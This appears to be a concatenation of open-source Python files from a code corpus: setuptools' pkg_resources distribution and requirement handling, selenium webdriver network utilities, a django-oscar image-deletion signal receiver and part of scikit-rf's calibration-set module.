for path_item in path:
# Ensure all the parent's path items are reflected in the child,
# if they apply
_handle_ns(packageName, path_item)
finally:
_imp.release_lock()
def fixup_namespace_packages(path_item, parent=None):
"""Ensure that previously-declared namespace packages include path_item"""
_imp.acquire_lock()
try:
for package in _namespace_packages.get(parent,()):
subpath = _handle_ns(package, path_item)
if subpath:
fixup_namespace_packages(subpath, package)
finally:
_imp.release_lock()
def file_ns_handler(importer, path_item, packageName, module):
"""Compute an ns-package subpath for a filesystem or zipfile importer"""
subpath = os.path.join(path_item, packageName.split('.')[-1])
normalized = _normalize_cached(subpath)
for item in module.__path__:
if _normalize_cached(item)==normalized:
break
else:
# Only return the path if it's not already there
return subpath
register_namespace_handler(pkgutil.ImpImporter, file_ns_handler)
register_namespace_handler(zipimport.zipimporter, file_ns_handler)
if importlib_machinery is not None:
register_namespace_handler(importlib_machinery.FileFinder, file_ns_handler)
def null_ns_handler(importer, path_item, packageName, module):
return None
register_namespace_handler(object, null_ns_handler)
def normalize_path(filename):
"""Normalize a file/dir name for comparison purposes"""
return os.path.normcase(os.path.realpath(filename))
def _normalize_cached(filename, _cache={}):
try:
return _cache[filename]
except KeyError:
_cache[filename] = result = normalize_path(filename)
return result
def _set_parent_ns(packageName):
parts = packageName.split('.')
name = parts.pop()
if parts:
parent = '.'.join(parts)
setattr(sys.modules[parent], name, sys.modules[packageName])
def yield_lines(strs):
"""Yield non-empty/non-comment lines of a string or sequence"""
if isinstance(strs, string_types):
for s in strs.splitlines():
s = s.strip()
# skip blank lines/comments
if s and not s.startswith('#'):
yield s
else:
for ss in strs:
for s in yield_lines(ss):
yield s
# whitespace and comment
LINE_END = re.compile(r"\s*(#.*)?$").match
# line continuation
CONTINUE = re.compile(r"\s*\\\s*(#.*)?$").match
# Distribution or extra
DISTRO = re.compile(r"\s*((\w|[-.])+)").match
# ver. info
VERSION = re.compile(r"\s*(<=?|>=?|===?|!=|~=)\s*((\w|[-.*_!+])+)").match
# comma between items
COMMA = re.compile(r"\s*,").match
OBRACKET = re.compile(r"\s*\[").match
CBRACKET = re.compile(r"\s*\]").match
MODULE = re.compile(r"\w+(\.\w+)*$").match
EGG_NAME = re.compile(
r"""
(?P<name>[^-]+) (
-(?P<ver>[^-]+) (
-py(?P<pyver>[^-]+) (
-(?P<plat>.+)
)?
)?
)?
""",
re.VERBOSE | re.IGNORECASE,
).match
class EntryPoint(object):
"""Object representing an advertised importable object"""
def __init__(self, name, module_name, attrs=(), extras=(), dist=None):
if not MODULE(module_name):
raise ValueError("Invalid module name", module_name)
self.name = name
self.module_name = module_name
self.attrs = tuple(attrs)
self.extras = Requirement.parse(("x[%s]" % ','.join(extras))).extras
self.dist = dist
def __str__(self):
s = "%s = %s" % (self.name, self.module_name)
if self.attrs:
s += ':' + '.'.join(self.attrs)
if self.extras:
s += ' [%s]' % ','.join(self.extras)
return s
def __repr__(self):
return "EntryPoint.parse(%r)" % str(self)
def load(self, require=True, *args, **kwargs):
"""
Require packages for this EntryPoint, then resolve it.
"""
if not require or args or kwargs:
warnings.warn(
"Parameters to load are deprecated. Call .resolve and "
".require separately.",
DeprecationWarning,
stacklevel=2,
)
if require:
self.require(*args, **kwargs)
return self.resolve()
def resolve(self):
"""
Resolve the entry point from its module and attrs.
"""
module = __import__(self.module_name, fromlist=['__name__'], level=0)
try:
return functools.reduce(getattr, self.attrs, module)
except AttributeError as exc:
raise ImportError(str(exc))
def require(self, env=None, installer=None):
if self.extras and not self.dist:
raise UnknownExtra("Can't require() without a distribution", self)
reqs = self.dist.requires(self.extras)
items = working_set.resolve(reqs, env, installer)
list(map(working_set.add, items))
pattern = re.compile(
r'\s*'
r'(?P<name>.+?)\s*'
r'=\s*'
r'(?P<module>[\w.]+)\s*'
r'(:\s*(?P<attr>[\w.]+))?\s*'
r'(?P<extras>\[.*\])?\s*$'
)
@classmethod
def parse(cls, src, dist=None):
"""Parse a single entry point from string `src`
Entry point syntax follows the form::
name = some.module:some.attr [extra1, extra2]
The entry name and module name are required, but the ``:attrs`` and
``[extras]`` parts are optional
"""
m = cls.pattern.match(src)
if not m:
msg = "EntryPoint must be in 'name=module:attrs [extras]' format"
raise ValueError(msg, src)
res = m.groupdict()
extras = cls._parse_extras(res['extras'])
attrs = res['attr'].split('.') if res['attr'] else ()
return cls(res['name'], res['module'], attrs, extras, dist)
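    # Illustrative sketch: parsing a single entry point specification. The
    # names 'main', 'mypkg.cli', 'run' and the 'color' extra are hypothetical.
    #
    #     ep = EntryPoint.parse('main = mypkg.cli:run [color]')
    #     ep.module_name    # -> 'mypkg.cli'
    #     ep.attrs          # -> ('run',)
    #     ep.extras         # -> ('color',)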
@classmethod
def _parse_extras(cls, extras_spec):
if not extras_spec:
return ()
req = Requirement.parse('x' + extras_spec)
if req.specs:
raise ValueError()
return req.extras
@classmethod
def parse_group(cls, group, lines, dist=None):
"""Parse an entry point group"""
if not MODULE(group):
raise ValueError("Invalid group name", group)
this = {}
for line in yield_lines(lines):
ep = cls.parse(line, dist)
if ep.name in this:
raise ValueError("Duplicate entry point", group, ep.name)
            this[ep.name] = ep
return this
@classmethod
def parse_map(cls, data, dist=None):
"""Parse a map of entry point groups"""
if isinstance(data, dict):
data = data.items()
else:
data = split_sections(data)
maps = {}
for group, lines in data:
if group is None:
if not lines:
continue
raise ValueError("Entry points must be listed in groups")
group = group.strip()
if group in maps:
raise ValueError("Duplicate group name", group)
maps[group] = cls.parse_group(group, lines, dist)
return maps
def _remove_md5_fragment(location):
if not location:
return ''
parsed = urlparse(location)
if parsed[-1].startswith('md5='):
return urlunparse(parsed[:-1] + ('',))
return location
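# Illustrative example: the md5 fragment that easy_install appends to
# download URLs is stripped before locations are compared.
#
#     _remove_md5_fragment('http://host/Foo-1.0.egg#md5=abc123')
#     # -> 'http://host/Foo-1.0.egg'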
class Distribution(object):
"""Wrap an actual or potential sys.path entry w/metadata"""
PKG_INFO = 'PKG-INFO'
def __init__(self, location=None, metadata=None, project_name=None,
version=None, py_version=PY_MAJOR, platform=None,
precedence=EGG_DIST):
self.project_name = safe_name(project_name or 'Unknown')
if version is not None:
self._version = safe_version(version)
self.py_version = py_version
self.platform = platform
self.location = location
self.precedence = precedence
self._provider = metadata or empty_provider
@classmethod
def from_location(cls, location, basename, metadata=None,**kw):
project_name, version, py_version, platform = [None]*4
basename, ext = os.path.splitext(basename)
if ext.lower() in _distributionImpl:
# .dist-info gets much metadata differently
match = EGG_NAME(basename)
if match:
project_name, version, py_version, platform = match.group(
'name','ver','pyver','plat'
)
cls = _distributionImpl[ext.lower()]
return cls(
location, metadata, project_name=project_name, version=version,
py_version=py_version, platform=platform, **kw
)
@property
def hashcmp(self):
return (
self.parsed_version,
self.precedence,
self.key,
_remove_md5_fragment(self.location),
self.py_version or '',
self.platform or '',
)
def __hash__(self):
return hash(self.hashcmp)
def __lt__(self, other):
return self.hashcmp < other.hashcmp
def __le__(self, other):
return self.hashcmp <= other.hashcmp
def __gt__(self, other):
return self.hashcmp > other.hashcmp
def __ge__(self, other):
return self.hashcmp >= other.hashcmp
def __eq__(self, other):
if not isinstance(other, self.__class__):
# It's not a Distribution, so they are not equal
return False
return self.hashcmp == other.hashcmp
def __ne__(self, other):
return not self == other
# These properties have to be lazy so that we don't have to load any
# metadata until/unless it's actually needed. (i.e., some distributions
# may not know their name or version without loading PKG-INFO)
@property
def key(self):
try:
return self._key
except AttributeError:
self._key = key = self.project_name.lower()
return key
@property
def parsed_version(self):
if not hasattr(self, "_parsed_version"):
self._parsed_version = parse_version(self.version)
return self._parsed_version
def _warn_legacy_version(self):
LV = packaging.version.LegacyVersion
is_legacy = isinstance(self._parsed_version, LV)
if not is_legacy:
return
# While an empty version is technically a legacy version and
# is not a valid PEP 440 version, it's also unlikely to
# actually come from someone and instead it is more likely that
# it comes from setuptools attempting to parse a filename and
# including it in the list. So for that we'll gate this warning
# on if the version is anything at all or not.
if not self.version:
return
tmpl = textwrap.dedent("""
'{project_name} ({version})' is being parsed as a legacy,
non PEP 440,
version. You may find odd behavior and sort order.
In particular it will be sorted as less than 0.0. It
is recommended to migrate to PEP 440 compatible
versions.
""").strip().replace('\n', ' ')
warnings.warn(tmpl.format(**vars(self)), PEP440Warning)
@property
def version(self):
try:
return self._version
except AttributeError:
for line in self._get_metadata(self.PKG_INFO):
if line.lower().startswith('version:'):
self._version = safe_version(line.split(':',1)[1].strip())
return self._version
else:
tmpl = "Missing 'Version:' header and/or %s file"
raise ValueError(tmpl % self.PKG_INFO, self)
@property
def _dep_map(self):
try:
return self.__dep_map
except AttributeError:
dm = self.__dep_map = {None: []}
for name in 'requires.txt', 'depends.txt':
for extra, reqs in split_sections(self._get_metadata(name)):
if extra:
if ':' in extra:
extra, marker = extra.split(':', 1)
if invalid_marker(marker):
# XXX warn
reqs=[]
elif not evaluate_marker(marker):
reqs=[]
extra = safe_extra(extra) or None
dm.setdefault(extra,[]).extend(parse_requirements(reqs))
return dm
def requires(self, extras=()):
"""List of Requirements needed for this distro if `extras` are used"""
dm = self._dep_map
deps = []
deps.extend(dm.get(None, ()))
for ext in extras:
try:
deps.extend(dm[safe_extra(ext)])
except KeyError:
raise UnknownExtra(
"%s has no such extra feature %r" % (self, ext)
)
return deps
def _get_metadata(self, name):
if self.has_metadata(name):
for line in self.get_metadata_lines(name):
yield line
def activate(self, path=None):
"""Ensure distribution is importable on `path` (default=sys.path)"""
if path is None:
path = sys.path
self.insert_on(path)
if path is sys.path:
fixup_namespace_packages(self.location)
for pkg in self._get_metadata('namespace_packages.txt'):
if pkg in sys.modules:
declare_namespace(pkg)
def egg_name(self):
"""Return what this distribution's standard .egg filename should be"""
filename = "%s-%s-py%s" % (
to_filename(self.project_name), to_filename(self.version),
self.py_version or PY_MAJOR
)
if self.platform:
filename += '-' + self.platform
return filename
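    # Illustrative example (hypothetical values): a distribution named
    # 'FooPkg' at version 1.2 on CPython 2.7 for win32 would yield
    #
    #     dist.egg_name()    # -> 'FooPkg-1.2-py2.7-win32'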
def __repr__(self):
if self.location:
return "%s (%s)" % (self, self.location)
else:
return str(self)
def __str__(self):
try:
version = getattr(self, 'version', None)
except ValueError:
version = None
version = version or "[unknown version]"
return "%s %s" % (self.project_name, version)
def __getattr__(self, attr):
"""Delegate all unrecognized public attributes to .metadata provider"""
if attr.startswith('_'):
raise AttributeError(attr)
return getattr(self._provider, attr)
@classmethod
def from_filename(cls, filename, metadata=None, **kw):
return cls.from_location(
_normalize_cached(filename), os.path.basename(filename), metadata,
**kw
)
def as_requirement(self):
"""Return a ``Requirement`` that matches this distribution exactly"""
if isinstance(self.parsed_version, packaging.version.Version):
spec = "%s==%s" % (self.project_name, self.parsed_version)
else:
spec = "%s===%s" % (self.project_name, self.parsed_version)
return Requirement.parse(spec)
def load_entry_point(self, group, name):
"""Return the `name` entry point of `group` or raise ImportError"""
ep = self.get_entry_info(group, name)
if ep is None:
raise ImportError("Entry point %r not found" % ((group, name),))
return ep.load()
def get_entry_map(self, group=None):
"""Return the entry point map for `group`, or the full entry map"""
try:
ep_map = self._ep_map
except AttributeError:
ep_map = self._ep_map = EntryPoint.parse_map(
self._get_metadata('entry_points.txt'), self
)
if group is not None:
return ep_map.get(group,{})
return ep_map
def get_entry_info(self, group, name):
"""Return the EntryPoint object for `group`+`name`, or ``None``"""
return self.get_entry_map(group).get(name)
    def insert_on(self, path, loc=None):
"""Insert self.location in path before its nearest parent directory"""
loc = loc or self.location
if not loc:
return
nloc = _normalize_cached(loc)
bdir = os.path.dirname(nloc)
        npath = [(p and _normalize_cached(p) or p) for p in path]
for p, item in enumerate(npath):
if item == nloc:
break
elif item == bdir and self.precedence == EGG_DIST:
# if it's an .egg, give it precedence over its directory
if path is sys.path:
self.check_version_conflict()
path.insert(p, loc)
npath.insert(p, nloc)
break
else:
if path is sys.path:
self.check_version_conflict()
path.append(loc)
return
# p is the spot where we found or inserted loc; now remove duplicates
while True:
try:
np = npath.index(nloc, p+1)
except ValueError:
break
else:
del npath[np], path[np]
                # continue scanning from the removed duplicate's position
                p = np
return
def check_version_conflict(self):
if self.key == 'setuptools':
# ignore the inevitable setuptools self-conflicts :(
return
nsp = dict.fromkeys(self._get_metadata('namespace_packages.txt'))
loc = normalize_path(self.location)
for modname in self._get_metadata('top_level.txt'):
if (modname not in sys.modules or modname in nsp
or modname in _namespace_packages):
continue
if modname in ('pkg_resources', 'setuptools', 'site'):
continue
fn = getattr(sys.modules[modname], '__file__', None)
if fn and (normalize_path(fn).startswith(loc) or
fn.startswith(self.location)):
continue
issue_warning(
"Module %s was already imported from %s, but %s is being added"
" to sys.path" % (modname, fn, self.location),
)
def has_version(self):
try:
self.version
except ValueError:
issue_warning("Unbuilt egg for " + repr(self))
return False
return True
def clone(self,**kw):
"""Copy this distribution, substituting in any changed keyword args"""
names = 'project_name version py_version platform location precedence'
for attr in names.split():
kw.setdefault(attr, getattr(self, attr, None))
kw.setdefault('metadata', self._provider)
return self.__class__(**kw)
@property
def extras(self):
return [dep for dep in self._dep_map if dep]
class DistInfoDistribution(Distribution):
"""Wrap an actual or potential sys.path entry w/metadata, .dist-info style"""
PKG_INFO = 'METADATA'
EQEQ = re.compile(r"([\(,])\s*(\d.*?)\s*([,\)])")
@property
def _parsed_pkg_info(self):
"""Parse and cache metadata"""
try:
return self._pkg_info
except AttributeError:
metadata = self.get_metadata(self.PKG_INFO)
self._pkg_info = email.parser.Parser().parsestr(metadata)
return self._pkg_info
@property
def _dep_map(self):
try:
return self.__dep_map
except AttributeError:
self.__dep_map = self._compute_dependencies()
return self.__dep_map
def _preparse_requirement(self, requires_dist):
"""Convert 'Foobar (1); baz' to ('Foobar ==1', 'baz')
Split environment marker, add == prefix to version specifiers as
        necessary, and remove parentheses.
"""
parts = requires_dist.split(';', 1) + ['']
distvers = parts[0].strip()
mark = parts[1].strip()
distvers = re.sub(self.EQEQ, r"\1==\2\3", distvers)
distvers = distvers.replace('(', '').replace(')', '')
return (distvers, mark)
def _compute_dependencies(self):
"""Recompute this distribution's dependencies."""
from pip._vendor._markerlib import compile as compile_marker
dm = self.__dep_map = {None: []}
reqs = []
# Including any condition expressions
for req in self._parsed_pkg_info.get_all('Requires-Dist') or []:
distvers, mark = self._preparse_requirement(req)
parsed = next(parse_requirements(distvers))
parsed.marker_fn = compile_marker(mark)
reqs.append(parsed)
def reqs_for_extra(extra):
for req in reqs:
if req.marker_fn(override={'extra':extra}):
yield req
common = frozenset(reqs_for_extra(None))
dm[None].extend(common)
for extra in self._parsed_pkg_info.get_all('Provides-Extra') or []:
extra = safe_extra(extra.strip())
dm[extra] = list(frozenset(reqs_for_extra(extra)) - common)
return dm
_distributionImpl = {
'.egg': Distribution,
'.egg-info': Distribution,
'.dist-info': DistInfoDistribution,
}
def issue_warning(*args,**kw):
level = 1
g = globals()
try:
# find the first stack frame that is *not* code in
# the pkg_resources module, to use for the warning
while sys._getframe(level).f_globals is g:
level += 1
except ValueError:
pass
warnings.warn(stacklevel=level + 1, *args, **kw)
class RequirementParseError(ValueError):
def __str__(self):
return ' '.join(self.args)
def parse_requirements(strs):
"""Yield ``Requirement`` objects for each specification in `strs`
`strs` must be a string, or a (possibly-nested) iterable thereof.
"""
# create a steppable iterator, so we can handle \-continuations
lines = iter(yield_lines(strs))
def scan_list(ITEM, TERMINATOR, line, p, groups, item_name):
items = []
while not TERMINATOR(line, p):
if CONTINUE(line, p):
try:
line = next(lines)
p = 0
except StopIteration:
msg = "\\ must not appear on the last nonblank line"
raise RequirementParseError(msg)
match = ITEM(line, p)
if not match:
msg = "Expected " + item_name + " in"
raise RequirementParseError(msg, line, "at", line[p:])
items.append(match.group(*groups))
p = match.end()
match = COMMA(line, p)
if match:
# skip the comma
p = match.end()
elif not TERMINATOR(line, p):
msg = "Expected ',' or end-of-list in"
raise RequirementParseError(msg, line, "at", line[p:])
match = TERMINATOR(line, p)
# skip the terminator, if any
if match:
p = match.end()
return line, p, items
for line in lines:
match = DISTRO(line)
if not match:
raise RequirementParseError("Missing distribution spec", line)
project_name = match.group(1)
p = match.end()
extras = []
match = OBRACKET(line, p)
if match:
p = match.end()
line, p, extras = scan_list(
DISTRO, CBRACKET, line, p, (1,), "'extra' name"
)
line, p, specs = scan_list(VERSION, LINE_END, line, p, (1, 2),
"version spec")
specs = [(op, val) for op, val in specs]
yield Requirement(project_name, specs, extras)
class Requirement:
def __init__(self, project_name, specs, extras):
"""DO NOT CALL THIS UNDOCUMENTED METHOD; use Requirement.parse()!"""
self.unsafe_name, project_name = project_name, safe_name(project_name)
self.project_name, self.key = project_name, project_name.lower()
self.specifier = packaging.specifiers.SpecifierSet(
",".join(["".join([x, y]) for x, y in specs])
)
self.specs = specs
self.extras = tuple(map(safe_extra, extras))
self.hashCmp = (
self.key,
self.specifier,
frozenset(self.extras),
)
self.__hash = hash(self.hashCmp)
def __str__(self):
extras = ','.join(self.extras)
if extras:
extras = '[%s]' % extras
return '%s%s%s' % (self.project_name, extras, self.specifier)
def __eq__(self, other):
return (
isinstance(other, Requirement) and
self.hashCmp == other.hashCmp
)
def __ne__(self, other):
return not self == other
def __contains__(self, item):
if isinstance(item, Distribution):
if item.key != self.key:
return False
item = item.version
# Allow prereleases always in order to match the previous behavior of
# this method. In the future this should be smarter and follow PEP 440
# more accurately.
return self.specifier.contains(item, prereleases=True)
def __hash__(self):
return self.__hash
def __repr__(self): return "Requirement.parse(%r)" % str(self)
@staticmethod
def parse(s):
reqs = list(parse_requirements(s))
if reqs:
if len(reqs) == 1:
return reqs[0]
raise ValueError("Expected only one requirement", s)
raise ValueError("No requirements found", s)
def _get_mro(cls):
"""Get an mro for a type or classic class"""
if not isinstance(cls, type):
        class cls(cls, object):
            pass
return cls.__mro__[1:]
return cls.__mro__
def _find_adapter(registry, ob):
"""Return an adapter factory for `ob` from `registry`"""
for t in _get_mro(getattr(ob, '__class__', type(ob))):
if t in registry:
return registry[t]
def ensure_directory(path):
"""Ensure that the parent directory of `path` exists"""
dirname = os.path.dirname(path)
if not os.path.isdir(dirname):
os.makedirs(dirname)
def _bypass_ensure_directory(path):
"""Sandbox-bypassing version of ensure_directory()"""
if not WRITE_SUPPORT:
raise IOError('"os.mkdir" not supported on this platform.')
dirname, filename = split(path)
if dirname and filename and not isdir(dirname):
_bypass_ensure_directory(dirname)
mkdir(dirname, 0o755)
def split_sections(s):
"""Split a string or iterable thereof into (section, content) pairs
Each ``section`` is a stripped version of the section header ("[section]")
and each ``content`` is a list of stripped lines excluding blank lines and
comment-only lines. If there are any such lines before the first section
header, they're returned in a first ``section`` of ``None``.
"""
section = None
content = []
for line in yield_lines(s):
if line.startswith("["):
if line.endswith("]"):
if section or content:
yield section, content
section = line[1:-1].strip()
content = []
else:
raise ValueError("Invalid section heading", line)
else:
content.append(line)
# wrap up last segment
yield section, content
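# --- illustrative sketch, not part of the original module -------------------
# split_sections() is what powers entry-point and metadata parsing; the
# ini-like text below is invented for demonstration.
def _example_split_sections():
    text = """
    [console_scripts]
    mytool = mypkg.cli:main
    """
    for section, content in split_sections(text):
        print(section, content)  # -> console_scripts ['mytool = mypkg.cli:main']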
def _mkstemp(*args, **kw):
    old_open = os.open
    try:
        # temporarily bypass sandboxing
        os.open = os_open
        return tempfile.mkstemp(*args, **kw)
    finally:
        # and then put it back
        os.open = old_open
# Silence the PEP440Warning by default, so that end users don't get hit by it
# randomly just because they use pkg_resources. We want to append the rule
# because we want earlier uses of filterwarnings to take precedence over this
# one.
warnings.filterwarnings("ignore", category=PEP440Warning, append=True)
# from jaraco.functools 1.3
def _call_aside(f, *args, **kwargs):
f(*args, **kwargs)
return f
@_call_aside
def _initialize(g=globals()):
"Set up global resource manager (deliberately not state-saved)"
manager = ResourceManager()
g['_manager'] = manager
for name in dir(manager):
if not name.startswith('_'):
g[name] = getattr(manager, name)
@_call_aside
def _initialize_master_working_set():
"""
Prepare the master working set and make the ``require()``
API available.
This function has explicit effects on the global state
of pkg_resources. It is intended to be invoked once at
the initialization of this module.
Invocation by other packages is unsupported and done
at their own risk.
"""
working_set = WorkingSet._build_master()
_declare_state('object', working_set=working_set)
require = working_set.require
iter_entry_points = working_set.iter_entry_points
add_activation_listener = working_set.subscribe
run_script = working_set.run_script
# backward compatibility
run_main = run_script
# Activate all distributions already on sys.path, and ensure that
# all distributions added to the working set in the future (e.g. by
# calling ``require()``) will get activated as well.
add_activation_listener(lambda dist: dist.activate())
    working_set.entries = []
# match order
list(map(working_set.add_entry, sys.path))
globals().update(locals())
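# --- illustrative sketch, not part of the original module -------------------
# After the initializers above run, the ResourceManager and WorkingSet APIs
# are exposed as module-level names; typical consumer code looks like:
def _example_working_set_usage():
    require('setuptools')                            # resolve/activate by name
    for ep in iter_entry_points('console_scripts'):  # enumerate entry points
        print(ep.name)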
| mit |
dorotan/pythontraining | env/Lib/site-packages/selenium/webdriver/common/utils.py | 3 | 4191 | # Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
Utility helpers shared across the webdriver package.
"""
import socket
from selenium.webdriver.common.keys import Keys
try:
basestring
except NameError:
# Python 3
basestring = str
def free_port():
"""
Determines a free port using sockets.
"""
free_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
free_socket.bind(('0.0.0.0', 0))
free_socket.listen(5)
port = free_socket.getsockname()[1]
free_socket.close()
return port
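# --- illustrative sketch, not part of the original module -------------------
# free_port() asks the OS for an ephemeral port by binding to port 0; note
# the socket is closed before returning, so another process could grab the
# port in the meantime.
def _example_free_port():
    port = free_port()
    print("would start a server on port %d" % port)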
def find_connectable_ip(host, port=None):
"""Resolve a hostname to an IP, preferring IPv4 addresses.
We prefer IPv4 so that we don't change behavior from previous IPv4-only
implementations, and because some drivers (e.g., FirefoxDriver) do not
support IPv6 connections.
If the optional port number is provided, only IPs that listen on the given
port are considered.
:Args:
- host - A hostname.
- port - Optional port number.
:Returns:
A single IP address, as a string. If any IPv4 address is found, one is
returned. Otherwise, if any IPv6 address is found, one is returned. If
neither, then None is returned.
"""
try:
addrinfos = socket.getaddrinfo(host, None)
except socket.gaierror:
return None
ip = None
for family, _, _, _, sockaddr in addrinfos:
connectable = True
if port:
connectable = is_connectable(port, sockaddr[0])
if connectable and family == socket.AF_INET:
return sockaddr[0]
if connectable and not ip and family == socket.AF_INET6:
ip = sockaddr[0]
return ip
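# --- illustrative sketch, not part of the original module -------------------
# find_connectable_ip() prefers IPv4 results from getaddrinfo; with a port it
# additionally filters to addresses that accept a connection on that port.
def _example_find_connectable_ip():
    print(find_connectable_ip('localhost'))           # typically '127.0.0.1'
    print(find_connectable_ip('localhost', port=80))  # None unless :80 is open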
def join_host_port(host, port):
"""Joins a hostname and port together.
    This is a minimal implementation intended to cope with IPv6 literals. For
    example, join_host_port('::1', 80) == '[::1]:80'.
:Args:
- host - A hostname.
- port - An integer port.
"""
if ':' in host and not host.startswith('['):
return '[%s]:%d' % (host, port)
return '%s:%d' % (host, port)
def is_connectable(port, host="localhost"):
    """
    Tries to connect to the server at the given port to see if it is running.
    :Args:
     - port: The port to connect to.
    """
socket_ = None
try:
socket_ = socket.create_connection((host, port), 1)
result = True
except socket.error:
result = False
finally:
if socket_:
socket_.close()
return result
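# --- illustrative sketch, not part of the original module -------------------
# Because is_connectable() attempts a real TCP connection with a 1-second
# timeout, it is also a cheap way to poll for a server becoming ready; the
# helper below is a hypothetical wrapper, not part of selenium's API.
def _example_wait_until_connectable(port, attempts=30):
    import time
    for _ in range(attempts):
        if is_connectable(port):
            return True
        time.sleep(0.5)
    return False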
def is_url_connectable(port):
    """
    Tries to connect to the HTTP server at the /status path
    on the specified port to see if it responds successfully.
    :Args:
     - port: The port to connect to.
    """
    try:
        from urllib import request as url_request
    except ImportError:
        import urllib2 as url_request
    try:
        res = url_request.urlopen("http://127.0.0.1:%s/status" % port)
        return res.getcode() == 200
    except Exception:
        # any failure (connection refused, bad response, etc.) means "not up"
        return False
def keys_to_typing(value):
    """Processes the values that will be typed in the element."""
    typing = []
    for val in value:
        if isinstance(val, Keys):
            # special-key constants are appended whole
            typing.append(val)
        elif isinstance(val, int):
            # integers are typed as their individual decimal digits
            typing.extend(str(val))
        else:
            # any other value is split into single characters
            typing.extend(val)
    return typing
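# --- illustrative sketch, not part of the original module -------------------
# keys_to_typing() flattens mixed input into single characters, while Keys
# constants (which encode special keys) are kept whole.
def _example_keys_to_typing():
    print(keys_to_typing(['ab', 12]))  # -> ['a', 'b', '1', '2']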
| apache-2.0 |
kapari/django-oscar | src/oscar/apps/catalogue/receivers.py | 60 | 1249 | # -*- coding: utf-8 -*-
from django.conf import settings
if settings.OSCAR_DELETE_IMAGE_FILES:
from oscar.core.loading import get_model
from django.db import models
from django.db.models.signals import post_delete
from sorl import thumbnail
from sorl.thumbnail.helpers import ThumbnailError
ProductImage = get_model('catalogue', 'ProductImage')
Category = get_model('catalogue', 'Category')
def delete_image_files(sender, instance, **kwargs):
"""
Deletes the original image, created thumbnails, and any entries
in sorl's key-value store.
"""
image_fields = (models.ImageField, thumbnail.ImageField)
for field in instance._meta.fields:
if isinstance(field, image_fields):
# Make Django return ImageFieldFile instead of ImageField
fieldfile = getattr(instance, field.name)
try:
thumbnail.delete(fieldfile)
except ThumbnailError:
pass
# connect for all models with ImageFields - add as needed
models_with_images = [ProductImage, Category]
for sender in models_with_images:
post_delete.connect(delete_image_files, sender=sender)
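# --- illustrative sketch, not part of the original module -------------------
# The receivers above only register when OSCAR_DELETE_IMAGE_FILES is enabled;
# a project opts in from its settings module, e.g.:
#
#     # settings.py (hypothetical project)
#     OSCAR_DELETE_IMAGE_FILES = True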
| bsd-3-clause |
willhaines/scikit-rf | skrf/calibration/calibrationSet.py | 10 | 4426 |
'''
.. module:: skrf.calibration.calibrationSet
================================================================
calibrationSet (:mod:`skrf.calibration.calibrationSet`)
================================================================
Contains the CalibrationSet class, and supporting functions
CalibrationSet Class
====================
.. autosummary::
:toctree: generated/
CalibrationSet
'''
from itertools import product, combinations, permutations
from .calibration import Calibration
from ..networkSet import NetworkSet
def cartesian_product(ideals, measured_sets, *args, **kwargs):
    '''
    Create a Calibration for every combination of measured networks, i.e.
    the cartesian product of the measured NetworkSets.
    '''
    measured_lists = product(*[k[:] for k in measured_sets])
    return [Calibration(ideals=ideals, measured=measured,
                        *args, **kwargs) for measured in measured_lists]
def dot_product(ideals, measured_sets, *args, **kwargs):
    '''
    Create a Calibration for each element-wise grouping of the measured sets.

    All measured NetworkSets must have the same length; the k-th Calibration
    is built from the k-th member of each set.
    '''
    for measured_set in measured_sets:
        if len(measured_set) != len(measured_sets[0]):
            raise IndexError('all measured NetworkSets must have the same '
                             'length for the dot-product combinatoric function')
    cal_list = []
    for k in range(len(measured_sets[0])):
        measured = [measured_set[k] for measured_set in measured_sets]
        cal_list.append(
            Calibration(ideals=ideals, measured=measured,
                        *args, **kwargs)
        )
    return cal_list
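# --- illustrative sketch, not part of the original module -------------------
# The two combinatoric functions differ only in how they pair measurements;
# the toy lists below stand in for NetworkSets of measured skrf Networks.
def _example_combinatorics():
    from itertools import product
    a = ['a1', 'a2']
    b = ['b1', 'b2']
    print(list(product(a, b)))  # cartesian pairing: 4 combinations
    print(list(zip(a, b)))      # dot-product pairing: 2 combinations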
class CalibrationSet(object):
'''
A set of Calibrations
This is designed to support experimental uncertainty analysis [1]_.
References
-----------
.. [1] A. Arsenovic, L. Chen, M. F. Bauwens, H. Li, N. S. Barker, and R. M. Weikle, "An Experimental Technique for Calibration Uncertainty Analysis," IEEE Transactions on Microwave Theory and Techniques, vol. 61, no. 1, pp. 263-269, 2013.
'''
def __init__(self, cal_class, ideals, measured_sets,*args, **kwargs):
'''
Parameters
----------
cal_class : a Calibration class
this is the class of calibration to use on the set. This
argument is the actual class itself like OnePort, TRL, SOLT, etc
ideals : list of Networks
measured_set : list of NetworkSets, or list of lists
each element in this list should be a corresponding measured
set to the ideals element of the same index. The sets
themselves can be anything list-like
        \\*args, \\**kwargs :
            passed to self.run()
'''
self.cal_class = cal_class
self.ideals = ideals
self.measured_sets = measured_sets
self.args = args
self.kwargs = kwargs
self.run(*args, **kwargs)
def __getitem__(self, key):
return self.cal_list[key]
    def apply_cal(self, raw_ntwk, *args, **kwargs):
        '''
        Apply each calibration in the set to `raw_ntwk`, returning the
        corrected networks as a NetworkSet.
        '''
        return NetworkSet([k.apply_cal(raw_ntwk) for k in self.cal_list],
                          *args, **kwargs)
    def plot_uncertainty_per_standard(self):
        '''
        Plot the standard deviation of s-parameter magnitude for each
        measured standard.
        '''
        self.dankness('std_s', 'plot_s_mag')
    def dankness(self, prop, func, *args, **kwargs):
        '''
        Call method `func` of attribute `prop` on each measured NetworkSet;
        if the attribute is not callable, return it instead.
        '''
        try:
            return [getattr(getattr(k, prop), func)(*args, **kwargs)
                    for k in self.measured_sets]
        except TypeError:
            return [getattr(getattr(k, prop), func)
                    for k in self.measured_sets]
    def run(self):
        raise NotImplementedError('SubClass must implement this')
@property
def corrected_sets(self):
'''
The set of corrected networks, each is corrected by its corresponding
element in the cal_list
'''
n_meas = len(self.cal_list[0].measured)
mat = [k.caled_ntwks for k in self.cal_list]
return [NetworkSet([k[l] for k in mat]) for l in range(n_meas)]
class Dot(CalibrationSet):
def run(self, *args, **kwargs):
ideals = self.ideals
measured_sets = self.measured_sets
